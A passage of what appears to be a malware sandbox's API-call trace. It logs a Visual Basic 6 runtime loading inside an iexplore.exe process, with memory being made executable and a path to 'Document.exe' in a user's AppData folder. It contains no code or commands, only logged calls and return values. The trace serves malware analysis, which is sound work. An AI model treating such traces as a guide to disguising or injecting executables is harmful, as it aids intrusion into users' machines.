1")) returned 1 [0199.612] OleInitialize (pvReserved=0x0) returned 0x0 [0199.673] lstrlenA (lpString="/Embedding") returned 10 [0199.674] lstrlenA (lpString="-Embedding") returned 10 [0199.676] lstrlenA (lpString="/UnRegServer") returned 12 [0199.677] lstrlenA (lpString="/RegServer") returned 10 [0199.678] OaBuildVersion () returned 0x321396 [0199.679] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x76720000 [0199.679] GetLastError () returned 0x0 [0199.679] GetProcAddress (hModule=0x76720000, lpProcName="OleLoadPictureEx") returned 0x767870a1 [0199.679] RegisterClipboardFormatA (lpszFormat="Link") returned 0xc141 [0199.679] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0ad [0199.679] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBFocusRT6", lpWndClass=0x30f928 | out: lpWndClass=0x30f928) returned 0 [0199.679] RegisterClassA (lpWndClass=0x30f928) returned 0xc1bf [0199.679] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBBubbleRT6", lpWndClass=0x30f928 | out: lpWndClass=0x30f928) returned 0 [0199.679] RegisterClassA (lpWndClass=0x30f928) returned 0xc1c0 [0199.680] GetUserDefaultLCID () returned 0x409 [0199.680] GetSystemInfo (in: lpSystemInfo=0x30f8e8 | out: lpSystemInfo=0x30f8e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0199.680] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x2000, flProtect=0x4) returned 0x120000 [0199.680] VirtualAlloc (lpAddress=0x120000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x120000 [0199.681] VirtualAlloc (lpAddress=0x120000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x120000 [0199.681] VirtualAlloc (lpAddress=0x120000, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x120000 [0199.681] VirtualAlloc (lpAddress=0x120000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x120000 [0199.681] VirtualAlloc (lpAddress=0x120000, dwSize=0x5000, flAllocationType=0x1000, flProtect=0x4) returned 0x120000 [0199.682] VirtualAlloc (lpAddress=0x120000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x120000 [0199.682] VirtualProtect (in: lpAddress=0x120000, dwSize=0x6000, flNewProtect=0x20, lpflOldProtect=0x30f944 | out: lpflOldProtect=0x30f944*=0x4) returned 1 [0199.682] GetCurrentProcess () returned 0xffffffff [0199.682] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x120000, dwSize=0x6000) returned 1 [0199.682] GlobalAddAtomA (lpString="VBDisabled") returned 0xc11d [0199.682] GetVersion () returned 0x1db10106 [0199.682] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76720000 [0199.682] GetProcAddress (hModule=0x76720000, lpProcName="DispCallFunc") returned 0x76733dcf [0199.682] GetProcAddress (hModule=0x76720000, lpProcName="LoadTypeLibEx") returned 0x767307b7 [0199.683] GetProcAddress (hModule=0x76720000, lpProcName="UnRegisterTypeLib") returned 0x76751ca9 [0199.683] GetProcAddress (hModule=0x76720000, lpProcName="CreateTypeLib2") returned 0x76738e70 [0199.683] GetProcAddress (hModule=0x76720000, lpProcName="VarDateFromUdate") returned 0x76737684 [0199.683] GetProcAddress (hModule=0x76720000, lpProcName="VarUdateFromDate") returned 0x7673cc98 [0199.683] GetProcAddress (hModule=0x76720000, lpProcName="GetAltMonthNames") returned 0x7676903a [0199.683] GetProcAddress (hModule=0x76720000, lpProcName="VarNumFromParseNum") returned 0x76736231 [0199.683] GetProcAddress (hModule=0x76720000, lpProcName="VarParseNumFromStr") returned 0x76735fea [0199.683] GetProcAddress (hModule=0x76720000, lpProcName="VarDecFromR4") returned 0x76743f94 [0199.683] GetProcAddress (hModule=0x76720000, lpProcName="VarDecFromR8") returned 0x76744e9e [0199.684] GetProcAddress (hModule=0x76720000, lpProcName="VarDecFromDate") returned 0x7676db72 [0199.684] GetProcAddress (hModule=0x76720000, lpProcName="VarDecFromI4") returned 0x76752a8c [0199.684] GetProcAddress (hModule=0x76720000, lpProcName="VarDecFromCy") returned 0x7676d737 [0199.684] GetProcAddress (hModule=0x76720000, lpProcName="VarR4FromDec") returned 0x7676e015 [0199.684] GetProcAddress (hModule=0x76720000, lpProcName="GetRecordInfoFromTypeInfo") returned 0x7676cc3d [0199.684] GetProcAddress (hModule=0x76720000, lpProcName="GetRecordInfoFromGuids") returned 0x7676d1c4 [0199.684] GetProcAddress (hModule=0x76720000, lpProcName="SafeArrayGetRecordInfo") returned 0x7676d48c [0199.684] GetProcAddress (hModule=0x76720000, lpProcName="SafeArraySetRecordInfo") returned 0x7676d4c6 [0199.684] GetProcAddress (hModule=0x76720000, lpProcName="SafeArrayGetIID") returned 0x7676d509 [0199.684] GetProcAddress (hModule=0x76720000, lpProcName="SafeArraySetIID") returned 0x7673e7bb [0199.684] GetProcAddress (hModule=0x76720000, lpProcName="SafeArrayCopyData") returned 0x7673e496 [0199.685] GetProcAddress (hModule=0x76720000, lpProcName="SafeArrayAllocDescriptorEx") returned 0x7673ddf1 [0199.685] GetProcAddress (hModule=0x76720000, lpProcName="SafeArrayCreateEx") returned 0x7676d53f [0199.685] GetProcAddress (hModule=0x76720000, lpProcName="VarFormat") returned 0x76772055 [0199.685] GetProcAddress (hModule=0x76720000, lpProcName="VarFormatDateTime") returned 0x767720ea [0199.685] GetProcAddress (hModule=0x76720000, lpProcName="VarFormatNumber") returned 0x76772151 [0199.685] GetProcAddress (hModule=0x76720000, lpProcName="VarFormatPercent") returned 0x767721f5 [0199.685] GetProcAddress (hModule=0x76720000, lpProcName="VarFormatCurrency") returned 0x76772288 [0199.685] GetProcAddress (hModule=0x76720000, lpProcName="VarWeekdayName") returned 0x76772335 [0199.685] GetProcAddress (hModule=0x76720000, lpProcName="VarMonthName") returned 0x767723d5 [0199.685] GetProcAddress (hModule=0x76720000, lpProcName="VarAdd") returned 0x76745934 [0199.686] GetProcAddress (hModule=0x76720000, lpProcName="VarAnd") returned 0x76745a98 [0199.686] GetProcAddress (hModule=0x76720000, lpProcName="VarCat") returned 0x767459b4 [0199.686] GetProcAddress (hModule=0x76720000, lpProcName="VarDiv") returned 0x7679e405 [0199.686] GetProcAddress (hModule=0x76720000, lpProcName="VarEqv") returned 0x7679ef07 [0199.686] GetProcAddress (hModule=0x76720000, lpProcName="VarIdiv") returned 0x7679f00a [0199.686] GetProcAddress (hModule=0x76720000, lpProcName="VarImp") returned 0x7679ef47 [0199.686] GetProcAddress (hModule=0x76720000, lpProcName="VarMod") returned 0x7679f15e [0199.686] GetProcAddress (hModule=0x76720000, lpProcName="VarMul") returned 0x7679dbd4 [0199.686] GetProcAddress (hModule=0x76720000, lpProcName="VarOr") returned 0x7679ecfa [0199.686] GetProcAddress (hModule=0x76720000, lpProcName="VarPow") returned 0x7679ea66 [0199.686] GetProcAddress (hModule=0x76720000, lpProcName="VarSub") returned 0x7679d332 [0199.687] GetProcAddress (hModule=0x76720000, lpProcName="VarXor") returned 0x7679ee2e [0199.687] GetProcAddress (hModule=0x76720000, lpProcName="VarAbs") returned 0x7679ca11 [0199.687] GetProcAddress (hModule=0x76720000, lpProcName="VarFix") returned 0x7679cc5f [0199.687] GetProcAddress (hModule=0x76720000, lpProcName="VarInt") returned 0x7679cde7 [0199.687] GetProcAddress (hModule=0x76720000, lpProcName="VarNeg") returned 0x7679c802 [0199.687] GetProcAddress (hModule=0x76720000, lpProcName="VarNot") returned 0x7679ec66 [0199.687] GetProcAddress (hModule=0x76720000, lpProcName="VarRound") returned 0x7679d155 [0199.687] GetProcAddress (hModule=0x76720000, lpProcName="VarCmp") returned 0x7673b0dc [0199.687] GetProcAddress (hModule=0x76720000, lpProcName="VarDecAdd") returned 0x76755f3e [0199.687] GetProcAddress (hModule=0x76720000, lpProcName="VarDecCmp") returned 0x76744fd0 [0199.688] GetProcAddress (hModule=0x76720000, lpProcName="VarBstrCat") returned 0x76740d2c [0199.688] GetProcAddress (hModule=0x76720000, lpProcName="VarCyMulI4") returned 0x767559ed [0199.688] GetProcAddress (hModule=0x76720000, lpProcName="VarBstrCmp") returned 0x7672f8b8 [0199.688] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x75cf0000 [0199.688] GetProcAddress (hModule=0x75cf0000, lpProcName="CoCreateInstanceEx") returned 0x75d39d4e [0199.688] GetProcAddress (hModule=0x75cf0000, lpProcName="CLSIDFromProgIDEx") returned 0x75d00782 [0199.688] GetSystemMetrics (nIndex=42) returned 0 [0199.688] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e688 | out: ppMalloc=0x72a4e688*=0x75e366bc) returned 0x0 [0199.688] IMalloc:Alloc (This=0x75e366bc, cb=0x4) returned 0x6c9070 [0199.688] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x30f65c, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe")) returned 0x35 [0199.688] lstrcatA (in: lpString1="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpString2=".cfg" | out: lpString1="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe.cfg") returned="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe.cfg" [0199.689] SetLastError (dwErrCode=0x0) [0199.689] SearchPathA (in: lpPath=0x0, lpFileName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe.cfg", lpExtension=0x0, nBufferLength=0x103, lpBuffer=0x30f558, lpFilePart=0x30f52c | out: lpBuffer="p÷0", lpFilePart=0x30f52c) returned 0x0 [0199.689] SetLastError (dwErrCode=0x2) [0199.689] GetLastError () returned 0x2 [0199.689] lstrcmpiA (lpString1="iexplore", lpString2="MTX") returned -1 [0199.689] lstrcmpiA (lpString1="iexplore", lpString2="DLLHOST") returned 1 [0199.689] lstrcmpiA (lpString1="iexplore", lpString2="INETINFO") returned -1 [0199.689] lstrcmpiA (lpString1="iexplore", lpString2="W3WP") returned -1 [0199.689] lstrcmpiA (lpString1="iexplore", lpString2="ASPNET_WP") returned 1 [0199.689] lstrcmpiA (lpString1="iexplore", lpString2="DLLHST3G") returned 1 [0199.689] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x30f650, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe")) returned 0x35 [0199.689] lstrcmpiA (lpString1="iexplore", lpString2="IEXPLORE") returned 0 [0199.689] LoadLibraryA (lpLibFileName="VERSION.DLL") returned 0x74ba0000 [0199.692] GetLastError () returned 0x0 [0199.692] GetProcAddress (hModule=0x74ba0000, lpProcName="VerQueryValueA") returned 0x74ba1b72 [0199.692] GetProcAddress (hModule=0x74ba0000, lpProcName="GetFileVersionInfoSizeA") returned 0x74ba1c9c [0199.693] GetProcAddress (hModule=0x74ba0000, lpProcName="GetFileVersionInfoA") returned 0x74ba1ced [0199.693] GetFileVersionInfoSizeA (in: lptstrFilename="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpdwHandle=0x30f960 | out: lpdwHandle=0x30f960) returned 0x40c [0199.693] GetFileVersionInfoA (in: lptstrFilename="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", dwHandle=0x0, dwLen=0x40c, lpData=0x3c2050 | out: lpData=0x3c2050) returned 1 [0199.693] VerQueryValueA (in: pBlock=0x3c2050, lpSubBlock="\\", lplpBuffer=0x30f95c, puLen=0x30f960 | out: lplpBuffer=0x30f95c*=0x3c2078, puLen=0x30f960) returned 1 [0199.693] LoadLibraryA (lpLibFileName="SXS.DLL") returned 0x757f0000 [0199.695] GetLastError () returned 0x0 [0199.695] GetProcAddress (hModule=0x757f0000, lpProcName="SxsOleAut32MapIIDOrCLSIDToTypeLibrary") returned 0x75837685 [0199.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30fba0, cbMultiByte=-1, lpWideCharStr=0x30fb30, cchWideChar=56 | out: lpWideCharStr="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe") returned 56 [0199.696] CoRegisterMessageFilter (in: lpMessageFilter=0x3c2054, lplpMessageFilter=0x3c205c | out: lplpMessageFilter=0x3c205c*=0x0) returned 0x0 [0199.696] IUnknown:AddRef (This=0x3c2054) returned 0x2 [0199.696] GetClassInfoExA (in: hInstance=0x72940000, lpszClass="ThunderRT6Main", lpwcx=0x30fba0 | out: lpwcx=0x30fba0) returned 0 [0199.696] LoadIconA (hInstance=0x400000, lpIconName=0x1) returned 0xb0065 [0199.697] GetModuleHandleA (lpModuleName="USER32") returned 0x77820000 [0199.697] GetProcAddress (hModule=0x77820000, lpProcName="GetSystemMetrics") returned 0x77837d2f [0199.697] GetProcAddress (hModule=0x77820000, lpProcName="MonitorFromWindow") returned 0x77843150 [0199.697] GetProcAddress (hModule=0x77820000, lpProcName="MonitorFromRect") returned 0x7785e7a0 [0199.697] GetProcAddress (hModule=0x77820000, lpProcName="MonitorFromPoint") returned 0x77845281 [0199.698] GetProcAddress (hModule=0x77820000, lpProcName="EnumDisplayMonitors") returned 0x7784451a [0199.698] GetProcAddress (hModule=0x77820000, lpProcName="GetMonitorInfoA") returned 0x77844413 [0199.698] GetSystemMetrics (nIndex=0) returned 1440 [0199.698] GetSystemMetrics (nIndex=78) returned 1440 [0199.698] GetSystemMetrics (nIndex=1) returned 900 [0199.698] GetSystemMetrics (nIndex=79) returned 900 [0199.698] GetSystemMetrics (nIndex=50) returned 16 [0199.698] GetSystemMetrics (nIndex=49) returned 16 [0199.698] LoadImageA (hInst=0x400000, name=0x1, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x5007b [0199.698] RegisterClassExA (param_1=0x30fba0) returned 0x8ec1c3 [0199.698] CreateWindowExA (dwExStyle=0x80, lpClassName="ThunderRT6Main", lpWindowName=0x0, dwStyle=0x80090000, X=-2147483648, Y=-2147483648, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x702de [0199.699] NtdllDefWindowProc_A (hWnd=0x702de, Msg=0x81, wParam=0x0, lParam=0x30f784) returned 0x1 [0199.701] NtdllDefWindowProc_A (hWnd=0x702de, Msg=0x83, wParam=0x0, lParam=0x30f770) returned 0x0 [0199.701] NtdllDefWindowProc_A (hWnd=0x702de, Msg=0x1, wParam=0x0, lParam=0x30f784) returned 0x0 [0199.701] NtdllDefWindowProc_A (hWnd=0x702de, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0199.701] NtdllDefWindowProc_A (hWnd=0x702de, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0199.701] MonitorFromWindow (hwnd=0x702de, dwFlags=0x2) returned 0x10001 [0199.701] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x30fba8 | out: lpmi=0x30fba8) returned 1 [0199.701] SetWindowPos (hWnd=0x702de, hWndInsertAfter=0x0, X=720, Y=450, cx=0, cy=0, uFlags=0x1d) returned 1 [0199.702] NtdllDefWindowProc_A (hWnd=0x702de, Msg=0x46, wParam=0x0, lParam=0x30fb48) returned 0x0 [0199.704] NtdllDefWindowProc_A (hWnd=0x702de, Msg=0x47, wParam=0x0, lParam=0x30fb48) returned 0x0 [0199.704] NtdllDefWindowProc_A (hWnd=0x702de, Msg=0x3, wParam=0x0, lParam=0x1c202d0) returned 0x0 [0199.704] ShowWindow (hWnd=0x702de, nCmdShow=4) returned 0 [0199.704] NtdllDefWindowProc_A (hWnd=0x702de, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0199.704] NtdllDefWindowProc_A (hWnd=0x702de, Msg=0x46, wParam=0x0, lParam=0x30fb5c) returned 0x0 [0199.705] NtdllDefWindowProc_A (hWnd=0x702de, Msg=0x47, wParam=0x0, lParam=0x30fb5c) returned 0x0 [0199.705] GetWindowThreadProcessId (in: hWnd=0x702de, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf0 [0199.705] VirtualQuery (in: lpAddress=0x30fbd0, lpBuffer=0x30fbb4, dwLength=0x1c | out: lpBuffer=0x30fbb4*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0199.705] GetUserDefaultLCID () returned 0x409 [0199.705] IsValidCodePage (CodePage=0x3a4) returned 1 [0199.706] IsValidCodePage (CodePage=0x3b5) returned 1 [0199.706] IsValidCodePage (CodePage=0x3b6) returned 1 [0199.706] IsValidCodePage (CodePage=0x3a8) returned 1 [0199.708] GetUserDefaultLangID () returned 0x409 [0199.708] GetSystemDefaultLangID () returned 0x6c0409 [0199.709] GetSystemMetrics (nIndex=42) returned 0 [0199.709] IMalloc:Alloc (This=0x75e366bc, cb=0xa8) returned 0x6cd8d8 [0199.709] IMalloc:GetSize (This=0x75e366bc, pv=0x6cd8d8) returned 0xa8 [0199.709] IMalloc:Alloc (This=0x75e366bc, cb=0xc) returned 0x6ca348 [0199.709] GetCurrentThreadId () returned 0xf0 [0199.709] IMalloc:Alloc (This=0x75e366bc, cb=0x3c) returned 0x6cd9a0 [0199.709] IMalloc:Alloc (This=0x75e366bc, cb=0x1c) returned 0x6c9900 [0199.709] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x30fb9c | out: phkResult=0x30fb9c*=0x0) returned 0x2 [0199.709] IMalloc:Alloc (This=0x75e366bc, cb=0x1c) returned 0x6c9928 [0199.709] GetCurrentThreadId () returned 0xf0 [0199.709] SetWindowsHookExA (idHook=-1, lpfn=0x729a1e09, hmod=0x0, dwThreadId=0xf0) returned 0x80243 [0199.710] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBMsoStdCompMgr", lpWndClass=0x30faf4 | out: lpWndClass=0x30faf4) returned 0 [0199.710] RegisterClassA (lpWndClass=0x30faf4) returned 0x98c1c5 [0199.710] CreateWindowExA (dwExStyle=0x0, lpClassName="VBMsoStdCompMgr", lpWindowName=0x0, dwStyle=0x80000000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x802c4 [0199.710] NtdllDefWindowProc_A (hWnd=0x802c4, Msg=0x81, wParam=0x0, lParam=0x30f730) returned 0x1 [0199.711] NtdllDefWindowProc_A (hWnd=0x802c4, Msg=0x83, wParam=0x0, lParam=0x30f71c) returned 0x0 [0199.711] NtdllDefWindowProc_A (hWnd=0x802c4, Msg=0x1, wParam=0x0, lParam=0x30f730) returned 0x0 [0199.711] NtdllDefWindowProc_A (hWnd=0x802c4, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0199.711] NtdllDefWindowProc_A (hWnd=0x802c4, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0199.711] SetWindowLongA (hWnd=0x802c4, nIndex=0, dwNewLong=3940508) returned 0 [0199.711] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0199.711] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0199.711] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0199.711] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0199.711] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0199.711] RegisterClipboardFormatA (lpszFormat="OwnerLink") returned 0xc003 [0199.711] RegisterClipboardFormatA (lpszFormat="FileName") returned 0xc006 [0199.712] CreateCompatibleDC (hdc=0x0) returned 0x7b010a69 [0199.712] GetCurrentObject (hdc=0x7b010a69, type=0x7) returned 0x185000f [0199.712] CreateWindowExA (dwExStyle=0x0, lpClassName="VBFocusRT6", lpWindowName=0x0, dwStyle=0x40000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x702de, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x20284 [0199.712] NtdllDefWindowProc_A (hWnd=0x20284, Msg=0x81, wParam=0x0, lParam=0x30f7c0) returned 0x1 [0199.712] NtdllDefWindowProc_A (hWnd=0x20284, Msg=0x83, wParam=0x0, lParam=0x30f7ac) returned 0x0 [0199.712] NtdllDefWindowProc_A (hWnd=0x20284, Msg=0x1, wParam=0x0, lParam=0x30f7c0) returned 0x0 [0199.712] NtdllDefWindowProc_A (hWnd=0x20284, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0199.712] NtdllDefWindowProc_A (hWnd=0x20284, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0199.712] NtdllDefWindowProc_A (hWnd=0x702de, Msg=0x210, wParam=0x1, lParam=0x20284) returned 0x0 [0199.713] GetCurrentThreadId () returned 0xf0 [0199.713] GetCurrentThreadId () returned 0xf0 [0199.713] lstrlenA (lpString="VB") returned 2 [0199.713] lstrlenA (lpString="Printer") returned 7 [0199.714] lstrlenA (lpString="VB") returned 2 [0199.714] lstrlenA (lpString="Form") returned 4 [0199.714] lstrlenA (lpString="VB") returned 2 [0199.715] lstrlenA (lpString="Screen") returned 6 [0199.715] lstrlenA (lpString="VB") returned 2 [0199.715] lstrlenA (lpString="Clipboard") returned 9 [0199.715] lstrlenA (lpString="VB") returned 2 [0199.715] lstrlenA (lpString="MDIForm") returned 7 [0199.716] lstrlenA (lpString="VB") returned 2 [0199.716] lstrlenA (lpString="App") returned 3 [0199.716] lstrlenA (lpString="VB") returned 2 [0199.716] lstrlenA (lpString="UserControl") returned 11 [0199.717] lstrlenA (lpString="VB") returned 2 [0199.717] lstrlenA (lpString="PropertyPage") returned 12 [0199.717] lstrcmpiA (lpString1="VB.MDIForm", lpString2="VB.PropertyPage") returned -1 [0199.717] lstrlenA (lpString="VB") returned 2 [0199.717] lstrlenA (lpString="UserDocument") returned 12 [0199.718] GetCurrentThreadId () returned 0xf0 [0199.718] GetCurrentThreadId () returned 0xf0 [0199.718] lstrlenA (lpString="VB") returned 2 [0199.718] lstrlenA (lpString="PictureBox") returned 10 [0199.719] lstrlenA (lpString="VB") returned 2 [0199.719] lstrlenA (lpString="Label") returned 5 [0199.720] lstrlenA (lpString="VB") returned 2 [0199.720] lstrlenA (lpString="TextBox") returned 7 [0199.720] lstrlenA (lpString="VB") returned 2 [0199.720] lstrlenA (lpString="Frame") returned 5 [0199.720] lstrlenA (lpString="VB") returned 2 [0199.720] lstrlenA (lpString="CommandButton") returned 13 [0199.722] lstrlenA (lpString="VB") returned 2 [0199.722] lstrlenA (lpString="CheckBox") returned 8 [0199.722] lstrlenA (lpString="VB") returned 2 [0199.722] lstrlenA (lpString="OptionButton") returned 12 [0199.723] lstrlenA (lpString="VB") returned 2 [0199.723] lstrlenA (lpString="ComboBox") returned 8 [0199.723] lstrlenA (lpString="VB") returned 2 [0199.723] lstrlenA (lpString="ListBox") returned 7 [0199.724] lstrlenA (lpString="VB") returned 2 [0199.724] lstrlenA (lpString="HScrollBar") returned 10 [0199.724] lstrlenA (lpString="VB") returned 2 [0199.724] lstrlenA (lpString="VScrollBar") returned 10 [0199.725] lstrlenA (lpString="VB") returned 2 [0199.725] lstrlenA (lpString="Timer") returned 5 [0199.725] lstrlenA (lpString="VB") returned 2 [0199.725] lstrlenA (lpString="DriveListBox") returned 12 [0199.725] lstrlenA (lpString="VB") returned 2 [0199.725] lstrlenA (lpString="DirListBox") returned 10 [0199.726] lstrlenA (lpString="VB") returned 2 [0199.726] lstrlenA (lpString="FileListBox") returned 11 [0199.726] lstrlenA (lpString="VB") returned 2 [0199.726] lstrlenA (lpString="Menu") returned 4 [0199.727] lstrlenA (lpString="VB") returned 2 [0199.727] lstrlenA (lpString="Shape") returned 5 [0199.727] lstrlenA (lpString="VB") returned 2 [0199.727] lstrlenA (lpString="Line") returned 4 [0199.728] lstrlenA (lpString="VB") returned 2 [0199.728] lstrlenA (lpString="Image") returned 5 [0199.728] lstrlenA (lpString="VB") returned 2 [0199.728] lstrlenA (lpString="Data") returned 4 [0199.728] lstrlenA (lpString="VB") returned 2 [0199.728] lstrlenA (lpString="OLE") returned 3 [0199.729] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6c90e8 [0199.729] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6ce988 [0199.729] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6ce9f8 [0199.729] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cea68 [0199.729] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cead8 [0199.729] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6ceb48 [0199.729] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cebb8 [0199.729] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cec28 [0199.729] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cec98 [0199.729] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6ced08 [0199.729] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6ced78 [0199.729] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cede8 [0199.729] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cee58 [0199.729] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6ceec8 [0199.729] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cef50 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cefc0 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cf030 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cf0a0 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cf110 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cf180 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cf1f0 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cf260 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cf2d0 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cf340 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cf3b0 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cf420 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cf490 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cf500 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cf570 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cf5e0 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cf650 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cf6c0 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cf730 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cf7a0 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cf810 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cf880 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cf8f0 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cf960 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cf9d0 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cfa40 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cfab0 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cfb20 [0199.730] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cfb90 [0199.731] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cfc00 [0199.731] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cfc70 [0199.731] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cfce0 [0199.731] IMalloc:Alloc (This=0x75e366bc, cb=0xc) returned 0x6ca360 [0199.731] IMalloc:Alloc (This=0x75e366bc, cb=0x3b0) returned 0x6cff38 [0199.731] IMalloc:GetSize (This=0x75e366bc, pv=0x6cff38) returned 0x3b0 [0199.731] IMalloc:Alloc (This=0x75e366bc, cb=0x20) returned 0x6c9a90 [0199.731] GetCurrentThreadId () returned 0xf0 [0199.732] GetCurrentThreadId () returned 0xf0 [0199.732] IMalloc:Alloc (This=0x75e366bc, cb=0x1c) returned 0x6c9ab8 [0199.732] VirtualProtect (in: lpAddress=0x120000, dwSize=0x6000, flNewProtect=0x4, lpflOldProtect=0x30fb20 | out: lpflOldProtect=0x30fb20*=0x20) returned 1 [0199.732] GetCurrentProcess () returned 0xffffffff [0199.732] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x120000, dwSize=0x6000) returned 1 [0199.732] VirtualAlloc (lpAddress=0x120000, dwSize=0x7000, flAllocationType=0x1000, flProtect=0x4) returned 0x120000 [0199.732] VirtualAlloc 